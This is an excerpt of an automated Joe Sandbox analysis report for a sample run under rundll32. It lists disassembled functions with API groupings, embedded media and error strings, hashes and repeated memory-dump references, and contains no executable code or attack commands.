                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterCurrentFrequencyThread
                                                                                                                                  • String ID: %s - %s$QueryPerformanceFrequency failed!$tictoc::elapsed${%x - Thread} [time-taken:%lf mecs]
                                                                                                                                  • API String ID: 2794441565-1894815428
                                                                                                                                  • Opcode ID: ba7330a78a44e98a6fe4daf9ad7e95193e872844c99b5209028e9c264dfbe5dd
                                                                                                                                  • Instruction ID: 1bba317a9f79f487bdb650a74916e14e33f5e1548796781d805f1c8c0c14da27
                                                                                                                                  • Opcode Fuzzy Hash: ba7330a78a44e98a6fe4daf9ad7e95193e872844c99b5209028e9c264dfbe5dd
                                                                                                                                  • Instruction Fuzzy Hash: B2417C32708B8A82E731DB64E4603EBB369FB94795F404236E68D53A98DF7DD245CB40
                                                                                                                                  Function 00007FFD92DBA410 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 192COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: %s: GetMajorType failed for video stream, error - %x$ConfigureSourceReaderVideo$GetGUID MF_MT_SUBTYPE hr=0x%08X le=%d$GetNativeMediaType hr=0x%08X le=%d$SetGUID MF_MT_SUBTYPE (%d) hr=0x%08X le=%d
                                                                                                                                  • API String ID: 1452528299-3155781339
                                                                                                                                  • Opcode ID: efa0075014274d6ca57fcb6332186627843c869df92de8aa5742aa0c05e12b95
                                                                                                                                  • Instruction ID: 9c408c773b8f4e64473c378a0fc928bd26c35b0b3a873174518343bde3452288
                                                                                                                                  • Opcode Fuzzy Hash: efa0075014274d6ca57fcb6332186627843c869df92de8aa5742aa0c05e12b95
                                                                                                                                  • Instruction Fuzzy Hash: 73914C26B09B1685FB308FEBE8A03AC3364BB48B85F014136DE5D67B64DE79E9059340
                                                                                                                                  Function 00007FFD92DB3200 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 179COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: GetGUID MF_MT_SUBTYPE hr=0x%08X le=%d$GetNativeMediaType Stream %d hr=0x%08X le=%d$SetCurrentMediaType MF_SOURCE_READER_FIRST_AUDIO_STREAM hr=0x%08X le=%d$SetGUID MF_MT_SUBTYPE (%d) hr=0x%08X le=%d
                                                                                                                                  • API String ID: 1452528299-3119712302
                                                                                                                                  • Opcode ID: e29568572fa14d84d16d7519d0c820b574227a19fb104b39875f44c73128b5f3
                                                                                                                                  • Instruction ID: 9d04cccea16fdde4d86f82fb75639d54d2ed886370e325f379287f516879d1a3
                                                                                                                                  • Opcode Fuzzy Hash: e29568572fa14d84d16d7519d0c820b574227a19fb104b39875f44c73128b5f3
                                                                                                                                  • Instruction Fuzzy Hash: EE71513671AB4682EB308F97E8A46696364FB88F85F115035DE4E53B64DE7DE401D700
                                                                                                                                  Function 000000018003BAE0 Relevance: 12.2, APIs: 8, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                  • Opcode ID: 3fbd0b3e35addabc098f64ab091990d7b6a2871f8ac9e4cce4e35d3e8861d74a
                                                                                                                                  • Instruction ID: fc16e1660138297f9bb3e8678e6c16cd315b57137c63fc5872edf9e7c8194a9d
                                                                                                                                  • Opcode Fuzzy Hash: 3fbd0b3e35addabc098f64ab091990d7b6a2871f8ac9e4cce4e35d3e8861d74a
                                                                                                                                  • Instruction Fuzzy Hash: 30619F32301B4892EBA3DB16E94139A73A0F78CBD8F058125AF4D47B51DF78C66AC740
                                                                                                                                  Function 00007FFD92DC3810 Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 736098846-0
                                                                                                                                  • Opcode ID: efc3fe0037e42635d1aa8fecd1ef55e2eadabcfa4abc9b3b191b5c73e548401a
                                                                                                                                  • Instruction ID: a71ed13292dcd256f6dc4ddd4aebe79e4aabeb9c173e3c801e3f12126509f7fc
                                                                                                                                  • Opcode Fuzzy Hash: efc3fe0037e42635d1aa8fecd1ef55e2eadabcfa4abc9b3b191b5c73e548401a
                                                                                                                                  • Instruction Fuzzy Hash: 66410935B16B8191FB649FA2E5A01B83368FF85F95B084239DE8E07B59CF799051D320
                                                                                                                                  Function 0000000180044B68 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                  • Opcode ID: 7b47a042eea3f3de49294c888d2e7f7195dfd9dc128bccc2e4caf73cebc8c57f
                                                                                                                                  • Instruction ID: f2ef72c2d081a62da6ba206108f7190fcdc76fe894ca0d405d2fc84784ff5a10
                                                                                                                                  • Opcode Fuzzy Hash: 7b47a042eea3f3de49294c888d2e7f7195dfd9dc128bccc2e4caf73cebc8c57f
                                                                                                                                  • Instruction Fuzzy Hash: 50411677A01A9D81EBE69B1191C03F972A0F7487DDF9AC116FA845B6C4DF38C7498308
                                                                                                                                  Function 00007FFD92DBEDE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect
                                                                                                                                  • String ID: Dest rect: {%d, %d, %d, %d}$PAR: %d x %d
                                                                                                                                  • API String ID: 400858303-602302452
                                                                                                                                  • Opcode ID: 559950210395ed975e79b44adc41054cec849b7582ad1d56a255cdf0ad68c0ce
                                                                                                                                  • Instruction ID: 6d5c6035828d8461c356153c8f9c0668ebe94a6db135dfb87690463cb46c969b
                                                                                                                                  • Opcode Fuzzy Hash: 559950210395ed975e79b44adc41054cec849b7582ad1d56a255cdf0ad68c0ce
                                                                                                                                  • Instruction Fuzzy Hash: 5A41AD36718B9583E7209FA6E45015977A8F788FC0F005136DE4E67B24CF79E854CB80
                                                                                                                                  Function 00007FFD92EDB0D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AllocDirectorySystem$AddressFreeLibraryLoadProc
                                                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll
                                                                                                                                  • API String ID: 1341906590-1831903832
                                                                                                                                  • Opcode ID: 9bc15085328f5bfa94c6fc05054273b19d9ba2339b94c399c8978e9a2a124876
                                                                                                                                  • Instruction ID: 7c32d87cf184fc5449560a552b238016c90c3fc945eb4b0cf7d3d49f8a216d87
                                                                                                                                  • Opcode Fuzzy Hash: 9bc15085328f5bfa94c6fc05054273b19d9ba2339b94c399c8978e9a2a124876
                                                                                                                                  • Instruction Fuzzy Hash: 2A41E625B19B9281FA70EF91B87437963A4BF44BD1F848239DD1D5BB84EE7DE0068300
                                                                                                                                  Function 00007FFD92ED1D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Local$AddressAllocConditionErrorFreeInfoLastMaskProcVerifyVersion
                                                                                                                                  • String ID: Advapi32.dll$RegQueryValueExW
                                                                                                                                  • API String ID: 3707099831-295176829
                                                                                                                                  • Opcode ID: 698e8803dc34555242da3cc59fb36ac2bbed8fae0d3c80f23629390359c3b53d
                                                                                                                                  • Instruction ID: 46856e45d3b65447ebd70dbeebec4703ade6200835a48e69cf01738710afdc39
                                                                                                                                  • Opcode Fuzzy Hash: 698e8803dc34555242da3cc59fb36ac2bbed8fae0d3c80f23629390359c3b53d
                                                                                                                                  • Instruction Fuzzy Hash: EE317172B09B4286FB70CF91A8A022973E8FB85B81F550539DE4D9BB54DF7DE4109700
                                                                                                                                  Function 0000000180024044 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: a9291c87b619f3b996d60f5c6d623e361a3f3665819b2df7064c52e3dbe42ad7
                                                                                                                                  • Instruction ID: 91e638e8e58f5590816a3cc392cfc10599bec749f4e2be6b6ca140d2a25e3853
                                                                                                                                  • Opcode Fuzzy Hash: a9291c87b619f3b996d60f5c6d623e361a3f3665819b2df7064c52e3dbe42ad7
                                                                                                                                  • Instruction Fuzzy Hash: 8C314172604A4981EA97DB15E4903D97760F79CBE0F548322BA6D0B7E9DE38C6CDC700
                                                                                                                                  Function 0000000180024174 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: 12eb798131b44ed89ccc95a849e9259a6caec3e02f1d91c0b99d509edef29d89
                                                                                                                                  • Instruction ID: 90848ef588fa6780bc4661c9358ff58c986763a4f68afd91812fa81bb0acabc5
                                                                                                                                  • Opcode Fuzzy Hash: 12eb798131b44ed89ccc95a849e9259a6caec3e02f1d91c0b99d509edef29d89
                                                                                                                                  • Instruction Fuzzy Hash: 23315232604A4881EA97DB26E4403D967A1F798BE0F549322FA5D576E5DF38CA8DC700
                                                                                                                                  Function 000000018000FC28 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
